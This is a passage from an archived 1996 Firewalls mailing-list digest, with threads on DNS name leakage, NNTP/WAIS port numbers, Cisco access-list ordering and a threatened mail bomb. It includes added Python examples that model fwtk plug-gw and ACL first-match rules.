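        opts = fields[3:]
        dest_host, dest_port = None, listen_port
        for i, tok in enumerate(opts):
            if tok == "-plug-to":
                dest_host = opts[i + 1]
            elif tok == "-port":
                dest_port = port_number(opts[i + 1])
        if dest_host is None:
            raise ValueError("plug-gw rule without -plug-to: " + raw)
        rules.append((listen_port, host_pattern, dest_host, dest_port))
    return rules


def host_matches(pattern, client):
    """Approximate fwtk matching: '*' wildcards, case-insensitive."""
    return fnmatch.fnmatchcase(client.lower(), pattern.lower())


def plug_decision(rules, listen_port, client):
    """First matching rule wins. Returns (dest_host, dest_port), or None
    when no rule admits this client on this port (connection refused)."""
    for port, pattern, dest_host, dest_port in rules:
        if port == listen_port and host_matches(pattern, client):
            return (dest_host, dest_port)
    return None


if __name__ == "__main__":
    table = parse_plug_rules(NETPERM_TABLE)
    for client in ("news.inside.example", "news.isp.example",
                   "pc42.inside.example", "elsewhere.example"):
        print("%-22s nntp -> %s" % (client, plug_decision(table, 119, client)))
```

The first-match rule is what makes the wildcard line safe here: a host that matches neither the explicit server entries nor the inside-domain wildcard gets no plug at all, which is the "restricting this connection to the other server" property the message relies on. The listening side is separate from the table: plug-gw only sees a connection when something (inetd with a plug-gw or netacl entry for the nntp port, as the message says) hands it one.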
Jean-Francois -- ______________________ Jean-Francois Zwobada ____________________ Apogee Communications Tel : +33 (1) 69 85 56 47 Parc Club Universite Fax : +33 (1) 69 85 56 48 28, rue Jean Rostand 91893 ORSAY Cedex e-mail : zwobada@apogee-com.fr __________________________________________________________________

From firewalls-owner Wed Jul 10 05:42:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA22283 for firewalls-outgoing; Wed, 10 Jul 1996 04:21:24 -0700 (PDT) Received: from mail.marben.com (losgatos.marben.com [206.86.34.51]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA22267 for ; Wed, 10 Jul 1996 04:21:08 -0700 (PDT) Received: (from girsch@localhost) From: girsch@marben.com (Arnaud Girsch) Message-Id: <199607101118.EAA03287@mail.marben.com> Subject: Re: DNS leakage To: twomey@mog.ucd.ie (Louis Twomey) Date: Wed, 10 Jul 1996 04:18:21 -0700 (PDT) Cc: firewalls-digest@GreatCircle.COM In-Reply-To: <199607101018.DAA16450@miles.greatcircle.com> from "Louis Twomey" at Jul 10, 96 11:18:30 am X-Organization: Marben Products, Inc. X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> Internal nameserver (IP address 192.168.1.10) :
> ---------------------------------------------
> named.boot :
> :
> primary xyz.ie xyz-internal.hosts
> secondary xyz.ie 1.2.3.4 xyz-external.hosts
> :
> forwarders 1.2.3.4
> [...]
> Unix 3.2D), and both machines are running bind-4.9.3-REL. When the internal
> nameserver loads the data for the secondary (external) domain xyz.ie, this
> overwrites the data for the primary (internal) domain xyz.ie in memory, and
> the machine can subsequently no longer resolve queries on this primary
> domain. Has anyone seen, and resolved, this problem with either this platform
> or with this version of bind ?
That's normal behaviour, as you shouldn't be both primary and secondary at the same time. The last declaration replaces the first declaration. Both primary and secondary seem buggy, for me. You can't have both of them on the same NS. This is not a working solution, AFAIK ...

Arnaud. -- Arnaud Girsch -+- agirsch@marben.com -+- Marben Products, Inc. - San Jose, CA

From firewalls-owner Wed Jul 10 06:04:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA27255 for firewalls-outgoing; Wed, 10 Jul 1996 05:25:46 -0700 (PDT) Received: from baldy.worldbit.com (baldy.worldbit.com [199.4.115.35]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id FAA27177 for ; Wed, 10 Jul 1996 05:25:22 -0700 (PDT) Received: from localhost (blast@localhost) by baldy.worldbit.com (8.7.5/8.7.3) with SMTP id FAA09502; Wed, 10 Jul 1996 05:19:50 -0700 (PDT) Date: Wed, 10 Jul 1996 05:19:50 -0700 (PDT) From: Blast To: Louis Twomey cc: firewalls-digest@GreatCircle.COM, ShepherdR@Aforbes.co.za Subject: Re: DNS leakage In-Reply-To: <199607101018.DAA16450@miles.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Wed, 10 Jul 1996, Louis Twomey wrote:
[deleted]
> > Problem is this:
> > The last time my zone was transferred to my ISP, the INTERNAL names
> > suddenly appeared on the internet! Of course this wrecked e-mail and
> > other things as well, but how is this possible? How can the outside DNS
> > provide the secondary with any information regarding the inside? BTW the
> > inside network is not even accessible from the Internet (and thus the
> > secondary DNS). Any ideas?

There are other places worth talking about here when it comes to internal host names leaking.

1) If you run a News server, most clients, when you do a post, will attach the hostname of the user. Unlike the SMTP leak, this includes all PCs and Macintoshes on the inside.
2) When you send mail, of course all the envelopes, unless you re-write them, will contain the hostnames in the 'Received by' headers.

3) Once you have zones that are picked up by a secondary somewhere out on the net, you can consider it disclosed. What I mean by this is that there are many ways for someone to get hostnames from your external DNS, so just consider it disclosed as most of us have.

Point number 1 was all I was going to post and if anyone knows of a way for it to stop leaking, I would like to hear it.

Thanks, --blast

Tim Keanini, aka blast -- "The limits of my language, are the limits of my world." --Ludwig Wittgenstein
Key fingerprint = 7B 68 88 41 A8 74 AB EC F0 37 98 4C 37 F7 40 D6
PUB KEY: http://www-swiss.ai.mit.edu/~bal/pks-commands.html

From firewalls-owner Wed Jul 10 06:22:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA04368 for firewalls-outgoing; Wed, 10 Jul 1996 06:04:59 -0700 (PDT) Received: from gatekeeper.glaxo.com (gatekeeper.glaxo.com [192.58.204.201]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA04347 for ; Wed, 10 Jul 1996 06:04:47 -0700 (PDT) Received: by gatekeeper.glaxo.com (5.65/fma-120691); Received: from ussun2f. (ussun2f.glaxo.com) by ussun1d (5.x/) Reply-To: ggh14854@ussun2f.glaxo.com Received: (from ggh14854@localhost) by ussun2f. (8.7.5/8.7.3) id JAA00871; Wed, 10 Jul 1996 09:03:46 -0400 (EDT) Date: Wed, 10 Jul 1996 09:03:44 -0400 (EDT) From: "Gary G. Hull" To: firewalls Subject: Web Server on DMZ Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

I realize this is not firewalls related but thought I might get the best answer(s) by asking this group.
What would be the security implications of moving our WEB Server to the DMZ? What would be the best way to make it secure? We would like to do this for performance reasons. Would having a box dedicated to WEB traffic located on the DMZ offer added performance to our WEB traffic? Thanks in advance for your assistance, opinions and information. As a corollary to these questions, what is the real throughput one could expect from the TIS Gauntlet for Web Traffic? Again thanks. |/ ---o0o-@@-o0o--------- Gary G. Hull - Technical Consultant From firewalls-owner Wed Jul 10 06:49:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA08426 for firewalls-outgoing; Wed, 10 Jul 1996 06:32:09 -0700 (PDT) Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA08398 for ; Wed, 10 Jul 1996 06:32:00 -0700 (PDT) Received: from netevolve.com by relay4.UU.NET with SMTP Received: from lazar by netevolve.com (4.1/SMI-4.1) Message-Id: <9607101332.AA12409@netevolve.com> Comments: Authenticated sender is From: "Irwin Lazar" Organization: Network Evolutions To: firewalls@greatcircle.com Date: Wed, 10 Jul 1996 09:29:54 +0000 Subject: Well Known Port Numbers Reply-To: lazar@netevolve.com X-Mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Greetings all: I'm trying to find the well known TCP and UDP port numbers to allow access to Usenet and WAIS but can't seem to find them in any of the reference materials I have. Does anyone know of or have this information? Thanks. Irwin M. Lazar Network Evolutions, Inc. 
lazar@netevolve.com

From firewalls-owner Wed Jul 10 07:09:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA08484 for firewalls-outgoing; Wed, 10 Jul 1996 06:32:28 -0700 (PDT) Received: from woffice10.welsh-ofce.gov.uk (woffice10.welsh-ofce.gov.uk [194.81.116.3]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA08424 for ; Wed, 10 Jul 1996 06:32:08 -0700 (PDT) Received: from woffice11.welsh-ofce.gov.uk.welsh-ofce.gov.uk (woffice11.welsh-ofce.gov.uk [194.81.116.4]) by woffice10.welsh-ofce.gov.uk (8.7.4/8.6.12) with SMTP id OAA00520 for ; Wed, 10 Jul 1996 14:29:21 +0100 (BST) Date: Wed, 10 Jul 96 14:19:46 PDT From: howells@Welsh-Ofce.gov.uk Subject: RE: Firewalls-Digest V5 #411 To: Firewalls@GreatCircle.COM X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Rob

A quick trip into Netscape - http://www.intonet.co.uk - shows that Intonet is a small UK service provider based in London. It's not clear from your posting what product this person/company purchased, but it is quite possible that the person is nothing to do with Intonet as a company. I would suggest passing the buck to your tech. support people with a note that this guy is not happy while, simultaneously, contacting Intonet (with your management's approval) to let them know what is going on (if he is 'internal' it will ring alarm bells with his senior management, while if he is a customer they may wish to monitor the threats he's making).

--Original Message--
Date: Tue, 9 Jul 1996 09:06:09 -0700 From: Rob Sansom Subject: Threats and Nasty Emails

Although this is not really related to firewalls, I was wondering if anyone had a suggestion for a response to a belligerent individual who has been threatening to 'mail bomb' our site, as well as slander our company in the UK.
Apparently, this person is very dissatisfied with the performance of the product that they purchased, and the resulting response from tech support. I guess that they got so frustrated that they sent a letter to 'root' at our site, and that's how I got involved. I am wondering if a response to the 'postmaster' or 'root' at their site would be a good idea, or should I just let it be. It's easy to block access from their net, but I would rather not do this. The net in question is 'intonet.co.uk' and I have tried 'whois' on the domain to no avail (to try to contact the net admin, God forbid this person should be the net admin!), and if anyone has any information on a contact at intonet.co.uk, I would greatly appreciate any information.

Thanks in Advance, Rob Sansom Network Admin. Connectix Corp (415) 638-7398 sansom@connectix.com
--End of Original Message--

These views are my own and do not represent the views of my Department. Regards Jerry ------------------------------------- Name: Jeremy P Howells E-mail: howells@welsh-ofce.gov.uk Time: 14:19:47 Date: 07/10/96 Tel: (UK) 01222 825754 Fax: (UK) 01222 825852 ------------------------------------

From firewalls-owner Wed Jul 10 07:19:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA11884 for firewalls-outgoing; Wed, 10 Jul 1996 07:10:19 -0700 (PDT) Received: from gate1.dttus.com (gate1.dttus.com [205.160.40.75]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA11825 for ; Wed, 10 Jul 1996 07:10:00 -0700 (PDT) Received: from cc1.dttus.com by gate1.dttus.com (5.x/SMI-SVR4) Received: from ccMail by cc1.dttus.com (SMTPLINK V2.11 PreRelease 4) Date: Wed, 10 Jul 96 09:00:00 CST From: "John M.
Shaw" Message-Id: <9606108370.AA837014565@cc1.dttus.com> To: firewalls@GreatCircle.com Subject: Newbie Cisco Access-List Question Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Assuming 2 lines with same source, s-mask, dest, and d-mask:

access-list 101 permit tcp source s-mask dest d-mask gt 1023
access-list 101 deny tcp source s-mask dest d-mask eq 2049

Which one takes precedence? Does the order matter? Any help would be greatly appreciated.

From firewalls-owner Wed Jul 10 07:49:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA16239 for firewalls-outgoing; Wed, 10 Jul 1996 07:45:22 -0700 (PDT) Received: from stingray.ivision.co.uk (stingray.ivision.co.uk [194.154.62.8]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA16070 for ; Wed, 10 Jul 1996 07:44:51 -0700 (PDT) Received: from stingray.ivision.co.uk [194.154.62.8] Date: Wed, 10 Jul 1996 15:38:13 +0100 (BST) From: Neil A Carson To: Irwin Lazar cc: firewalls@greatcircle.com Subject: Re: Well Known Port Numbers In-Reply-To: <9607101332.AA12409@netevolve.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Wed, 10 Jul 1996, Irwin Lazar wrote:
> Greetings all:
>
> I'm trying to find the well known TCP and UDP port numbers to allow
> access to Usenet and WAIS but can't seem to find them in any of the
> reference materials I have. Does anyone know of or have this
> information?

On a unix box, try looking in /etc/services. Or use the NIS services file, by typing ypcat services. This yields

z39.50 210/tcp wais #ANSI Z39.50
z39.50 210/udp wais #ANSI Z39.50
nntp 119/tcp usenet #Network News Transfer Protocol
nntp 119/udp usenet #Network News Transfer Protocol

on a FreeBSD box here. Unless of course you have stripped down the services file (which one would do in building a firewall anyway).

Yours Aye, Neil * Neil A Carson * Internet Vision Ltd.
* E-Mail: neil@ivision.co.uk, Phone: (0171) 589 4500

From firewalls-owner Wed Jul 10 08:04:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA14845 for firewalls-outgoing; Wed, 10 Jul 1996 07:36:17 -0700 (PDT) Received: from zen.com (zen.com [156.70.135.251]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA14764 for ; Wed, 10 Jul 1996 07:35:56 -0700 (PDT) Received: from usuwphmsx03.zen.con (usuwphmsx03.zen.com) by zen.com (4.1/SMI-4.1) Received: by usuwphmsx03.zen.con with Microsoft Exchange (IMC 4.0.837.3) Message-Id: From: Miller Robert RC To: "'firewalls@GreatCircle.COM'" Subject: RE: Threats and Nasty Emails Date: Wed, 10 Jul 1996 10:33:56 -0400 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>
>>At 09:06 AM 7/9/96 -0700, Rob Sansom allegedly wrote:
>
>>>>Although this is not really related to firewalls, I was wondering If
>>>>anyone had a suggestion for a response to a belligerent individual who
>>>>has been threatening to 'mail bomb' our site, as well as slander our
>>>>company in the UK. . . .
>
>>Frank writes some good advice, and then says:
>>>If the customer does not have a legitimate complaint, explain to the
>>>individual why the complaint is not valid. . . .

Chris responded:
>>Absolutely not. You're a sysadmin, not customer support or a service
>>bureau for outside things. Take the issues to your management, and
>>let them deal with it. You shouldn't in any way contact the customer.

What Chris says is absolutely correct! You shouldn't even respond to the person's note without passing it on to your management, Legal Department, PR department, Customer Service Department or whatever (depending on how big your company is). Even then, it should not be for you to respond, but for one of them. Leave that to the people who get paid to deal with the customers...
Bob Miller millerrc@zen.com Zeneca Pharmaceuticals, Inc. From firewalls-owner Wed Jul 10 08:20:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17948 for firewalls-outgoing; Wed, 10 Jul 1996 07:59:27 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA17941 for ; Wed, 10 Jul 1996 07:59:21 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id HAA06382; Wed, 10 Jul 1996 07:56:43 -0700 Date: Wed, 10 Jul 1996 07:56:43 -0700 (PDT) From: Robert Hanson To: Irwin Lazar cc: firewalls@GreatCircle.COM Subject: Re: Well Known Port Numbers In-Reply-To: <9607101332.AA12409@netevolve.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk wais 210 nntp 119 ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com On Wed, 10 Jul 1996, Irwin Lazar wrote: > Greetings all: > > I'm trying to find the well known TCP and UDP port numbers to allow > access to Usenet and WAIS but can't seem to find them in any of the > reference materials I have. Does anyone know of or have this > information? > > Thanks. > Irwin M. Lazar > Network Evolutions, Inc. 
> lazar@netevolve.com
>

From firewalls-owner Wed Jul 10 08:31:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17478 for firewalls-outgoing; Wed, 10 Jul 1996 07:54:41 -0700 (PDT) Received: from achilles.noc.ntua.gr (achilles.noc.ntua.gr [147.102.222.210]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA17391 for ; Wed, 10 Jul 1996 07:54:20 -0700 (PDT) Received: by achilles.noc.ntua.gr via NTUAnet with ESMTP Received: by noc.ntua.gr From: Yiorgos Adamopoulos Message-Id: <199607101451.RAA13089@noc.ntua.gr> Subject: Re: Well Known Port Numbers To: lazar@netevolve.com Date: Wed, 10 Jul 1996 17:51:18 +0300 (EET DST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9607101332.AA12409@netevolve.com> from "Irwin Lazar" at Jul 10, 96 09:29:54 am Organization: NTUA-NOC, National Technical University of Athens, GREECE Reply-To: y.adamopoulos@noc.ntua.gr X-Disclaimer: My opinions do not necessarily represent those of my employer. X-Home-Address: 7 Elvetias St., Agia Paraskevi GR15342, Athens, GREECE X-Home-Phone: +30-1-639-4-638 X-Work-Phone: +30-1-772-1-861 X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

> I'm trying to find the well known TCP and UDP port numbers to allow
> access to Usenet and WAIS but can't seem to find them in any of the
> reference materials I have. Does anyone know of or have this
> information?

I think you need to read the "Assigned Numbers" RFC (by IANA, can't remember the number) and mainly the ports section.

-Yiorgos.
Y.Adamopoulos@noc.ntua.gr

From firewalls-owner Wed Jul 10 08:34:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20598 for firewalls-outgoing; Wed, 10 Jul 1996 08:21:35 -0700 (PDT) Received: from rodan.UU.NET (rodan.UU.NET [153.39.130.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA20570 for ; Wed, 10 Jul 1996 08:21:22 -0700 (PDT) Received: from woobie.uu.net by rodan.UU.NET with SMTP Message-ID: <31E3C9D9.167EB0E7@uu.net> Date: Wed, 10 Jul 1996 11:18:49 -0400 From: Mark Krause Organization: UUNET Technologies, Inc. X-Mailer: Mozilla 3.0b5 (X11; I; SunOS 4.1.3_U1 sun4c) MIME-Version: 1.0 To: lazar@netevolve.com CC: firewalls@greatcircle.com Subject: Re: Well Known Port Numbers References: <9607101332.AA12409@netevolve.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Irwin Lazar wrote:
>
> I'm trying to find the well known TCP and UDP port numbers to allow
> access to Usenet and WAIS but can't seem to find them in any of the
> reference materials I have. Does anyone know of or have this
> information?

Both of these are hard to find, since they are usually listed via NNTP (Network News Transfer Protocol) for USENET, and Z39.50 (the standard that WAIS is based on).

USENET aka NNTP = TCP 119
WAIS aka Z39.50 = TCP 210

The following are good resources for looking up port numbers.

ftp://ds.internic.net/std/std2.txt Assigned Numbers RFC 1700
The strobe.services file in the strobe distribution located at ftp://suburbia.net/pub/strobe.tgz
Appendix G "Table of IP Services" in "Practical UNIX & Internet Security" 2nd Edition from O'Reilly & Associates, Inc.

-- Mark Krause UUNET Technologies, Inc.
http://www.uu.net/ Senior Security Engineer 3060 Williams Drive mkrause@uu.net Fairfax, VA 22031-4648 USA Tel: +1 703 208 5349 Fax: +1 703 206 5493 From firewalls-owner Wed Jul 10 09:49:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA28491 for firewalls-outgoing; Wed, 10 Jul 1996 09:42:56 -0700 (PDT) Received: from mailbox.neosoft.com (mailbox.neosoft.com [206.109.1.16]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA28482 for ; Wed, 10 Jul 1996 09:42:50 -0700 (PDT) Received: from fw.nmti.com (fw.baileynm.com [206.109.159.11]) by mailbox.neosoft.com (8.7.5/8.7.3) with SMTP id LAA16432; Wed, 10 Jul 1996 11:40:02 -0500 (CDT) Received: from web.nmti.com(198.178.0.201) by fw.nmti.com via smap (V1.3) Received: from sonic.nmti.com (peter@sonic.nmti.com [198.178.0.2]) by web.nmti.com (8.6.12/8.6.9) with SMTP id LAA04919; Wed, 10 Jul 1996 11:31:49 -0500 Received: by sonic.nmti.com; id AA32200; Wed, 10 Jul 1996 11:31:48 -0500 From: peter@baileynm.com (Peter da Silva) Message-Id: <9607101631.AA32200@sonic.nmti.com.nmti.com> Subject: Re: Well Known Port Numbers To: neil@ivision.co.uk (Neil A Carson) Date: Wed, 10 Jul 1996 11:31:47 -0500 (CDT) Cc: lazar@netevolve.com, firewalls@GreatCircle.COM In-Reply-To: from "Neil A Carson" at Jul 10, 96 03:38:13 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Unless of course you have stripped down the services file (which one would > do in building a firewall anyway). Why? It's the inetd.conf file that controls that stuff, not services. 
From firewalls-owner Wed Jul 10 10:04:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA28197 for firewalls-outgoing; Wed, 10 Jul 1996 09:36:21 -0700 (PDT) Received: from gate1.dttus.com (gate1.dttus.com [205.160.40.75]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA28190 for ; Wed, 10 Jul 1996 09:36:15 -0700 (PDT) Received: from cc1.dttus.com by gate1.dttus.com (5.x/SMI-SVR4) Received: from ccMail by cc1.dttus.com (SMTPLINK V2.11 PreRelease 4) Date: Wed, 10 Jul 96 10:38:05 CST From: "John M. Shaw" Message-Id: <9606108370.AA837020476@cc1.dttus.com> To: firewalls@GreatCircle.com Subject: Re[2]: Newbie Cisco Access-List Question Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Is it the same for "ip route"? If I have 2 lines from my ISP hooked up to the serial lines on my router:

ip route 0.0.0.0 0.0.0.0 Serial0
ip route 0.0.0.0 0.0.0.0 Serial1

Will anything get sent over Serial1? Is there a way to somewhat balance the load between the 2 lines?

TIA jshaw@dttus.com

______________________________ Reply Separator _________________________________
Subject: Re: Newbie Cisco Access-List Question Author: Warren Auld at INTERNET-USA Date: 7/10/96 10:08 AM

Hi, Yes, order matters -- the entries in an access list are evaluated sequentially until a match is found, at which point the packet is either sent on or rejected. In the example you gave below, all packets addressed to ports higher than 1023 will make it through and the second line will never have any effect. If you reverse the lines, traffic to port 2049 would be denied while everything else above 1023 would get through. Hope this helps....

warren wauld01@mail.state.mo.us

On Wed, 10 Jul 1996, John M. Shaw wrote:
>
>
> Assuming 2 lines with same source, s-mask, dest, and d-mask:
>
> access-list 101 permit tcp source s-mask dest d-mask gt 1023
> access-list 101 deny tcp source s-mask dest d-mask eq 2049
>
> Which one takes precedence?
> Does the order matter? > > Any help would be greatly appreciated? > > From firewalls-owner Wed Jul 10 10:34:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA00672 for firewalls-outgoing; Wed, 10 Jul 1996 10:20:28 -0700 (PDT) Received: from gatekeeper.glaxo.com (gatekeeper.glaxo.com [192.58.204.201]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA00653 for ; Wed, 10 Jul 1996 10:20:20 -0700 (PDT) Received: by gatekeeper.glaxo.com (5.65/fma-120691); Received: from ussun2f. (ussun2f.glaxo.com) by ussun1d (5.x/) Reply-To: ggh14854@ussun2f.glaxo.com Received: (from ggh14854@localhost) by ussun2f. (8.7.5/8.7.3) id NAA01250; Wed, 10 Jul 1996 13:19:21 -0400 (EDT) Date: Wed, 10 Jul 1996 13:19:20 -0400 (EDT) From: "Gary G. Hull" To: firewalls@greatcircle.com Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk REVIEW firewalls by Name From firewalls-owner Wed Jul 10 10:49:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA02914 for firewalls-outgoing; Wed, 10 Jul 1996 10:42:05 -0700 (PDT) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA02889 for ; Wed, 10 Jul 1996 10:41:57 -0700 (PDT) Received: from pferguso-pc.cisco.com (c5robo3.cisco.com [171.68.13.131]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id KAA28650; Wed, 10 Jul 1996 10:40:27 -0700 Message-Id: <199607101740.KAA28650@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 Jul 1996 13:39:25 -0400 To: lazar@netevolve.com From: Paul Ferguson Subject: Re: Well Known Port Numbers Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Try RFC-1700. 
- paul

At 09:29 AM 7/10/96 +0000, Irwin Lazar wrote:
>Greetings all:
>
>I'm trying to find the well known TCP and UDP port numbers to allow
>access to Usenet and WAIS but can't seem to find them in any of the
>reference materials I have. Does anyone know of or have this
>information?
>
>Thanks.
>Irwin M. Lazar
>Network Evolutions, Inc.
>lazar@netevolve.com
>

-- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s

From firewalls-owner Wed Jul 10 11:05:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA03337 for firewalls-outgoing; Wed, 10 Jul 1996 10:45:09 -0700 (PDT) Received: from lint.cisco.com (lint.cisco.com [171.68.223.44]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA03247 for ; Wed, 10 Jul 1996 10:44:51 -0700 (PDT) Received: from pferguso-pc.cisco.com (c5robo3.cisco.com [171.68.13.131]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id KAA29656; Wed, 10 Jul 1996 10:43:21 -0700 Message-Id: <199607101743.KAA29656@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 10 Jul 1996 13:42:18 -0400 To: "John M. Shaw" From: Paul Ferguson Subject: Re: Newbie Cisco Access-List Question Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

At 09:00 AM 7/10/96 CST, John M. Shaw wrote:
> Assuming 2 lines with same source, s-mask, dest, and d-mask:
>
> access-list 101 permit tcp source s-mask dest d-mask gt 1023
> access-list 101 deny tcp source s-mask dest d-mask eq 2049
>
> Which one takes precedence?

The access-list expressions are parsed linearly, from first-to-last, until a match is made and then no further ACLs are referenced. Also, in the example above, any packet which did not match either ACL would be implicitly denied.
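A model of the first-match evaluation described in the replies, added here as an example (not code from the thread or from Cisco): it reads the two access-list lines from the question and shows that port 2049 is permitted in the posted order and denied when the lines are swapped, with the implicit deny catching everything else. It assumes source and destination already matched, so only the destination-port test is modelled.

```python
# Added example, not from the list thread: a small model of Cisco extended
# access-list evaluation as described in the replies (entries are tried in
# order, the first match decides, and a packet matching no entry is denied).
# Assumption: source/destination already matched, so only the port test
# on each entry is modelled.  The two entries are the ones from the question.
from dataclasses import dataclass


@dataclass(frozen=True)
class AclEntry:
    action: str     # "permit" or "deny"
    op: str         # "eq", "gt", "lt", "neq", or "" when there is no port test
    port: int = 0


def parse_acl(lines):
    """Parse 'access-list N permit|deny tcp src s-mask dst d-mask [op port]'."""
    entries = []
    for raw in lines:
        t = raw.split()
        if len(t) < 8 or t[0] != "access-list" or t[2] not in ("permit", "deny"):
            raise ValueError(f"bad entry: {raw!r}")
        op, port = ("", 0) if len(t) == 8 else (t[8], int(t[9]))
        if op not in ("", "eq", "gt", "lt", "neq"):
            raise ValueError(f"unsupported operator {op!r} in {raw!r}")
        entries.append(AclEntry(t[2], op, port))
    return entries


def _port_matches(e, port):
    return {"": True, "eq": port == e.port, "gt": port > e.port,
            "lt": port < e.port, "neq": port != e.port}[e.op]


def evaluate(entries, dst_port):
    """Return (decision, index); index is None when the implicit deny fired."""
    for i, e in enumerate(entries):
        if _port_matches(e, dst_port):
            return e.action, i          # first match wins, later entries ignored
    return "deny", None                 # implicit deny at the end of every ACL


AS_POSTED = parse_acl([
    "access-list 101 permit tcp source s-mask dest d-mask gt 1023",
    "access-list 101 deny tcp source s-mask dest d-mask eq 2049",
])
REVERSED = parse_acl([
    "access-list 101 deny tcp source s-mask dest d-mask eq 2049",
    "access-list 101 permit tcp source s-mask dest d-mask gt 1023",
])

if __name__ == "__main__":
    for name, acl in (("as posted", AS_POSTED), ("reversed", REVERSED)):
        for port in (2049, 8080, 25):
            print(f"{name}: port {port} -> {evaluate(acl, port)}")
```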
